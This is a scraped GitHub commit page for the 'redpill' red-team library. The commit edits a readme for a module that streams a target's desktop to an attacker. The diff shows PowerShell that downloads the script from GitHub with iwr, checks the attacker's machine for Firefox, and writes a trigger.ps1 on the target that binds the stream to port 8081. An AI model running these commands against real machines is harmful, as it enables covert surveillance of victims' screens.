Skip to content

Commit

Permalink
redpill v1.2.6 - RedTeam database library
Browse files Browse the repository at this point in the history
  • Loading branch information
r00t-3xp10it authored May 30, 2022
1 parent a2852df commit d9eb72f
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions lib/Stream-TargetDesktop/readme.md
Original file line number Diff line number Diff line change
Expand Up @@ -16,14 +16,14 @@ iwr -uri "https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Stream
**prerequesites:**
```powershell
#Make sure Firefox ( with MJPEG ) its installed on attacker machine
[bool](Get-ItemProperty -Path "HKLM:\SOFTWARE\Mozilla\Mozilla Firefox" -EA SilentlyContinue).CurrentVersion
[bool](Get-ItemProperty -Path "HKLM:\SOFTWARE\Mozilla\Mozilla Firefox" -EA SilentlyContinue)
```

<br />

**execute:**
```powershell
#Build triggers script (remote)
#Build trigger script (remote)
echo "Import-Module -Name $Env:TMP\Stream-TargetDesktop.ps1 -Force"|Out-File -FilePath "$Env:TMP\trigger.ps1" -Encoding ascii -Force
Add-Content -Path "$Env:TMP\trigger.ps1" -Value "TargetScreen -Bind -Port 8081"
Expand Down

0 comments on commit d9eb72f

Please sign in to comment.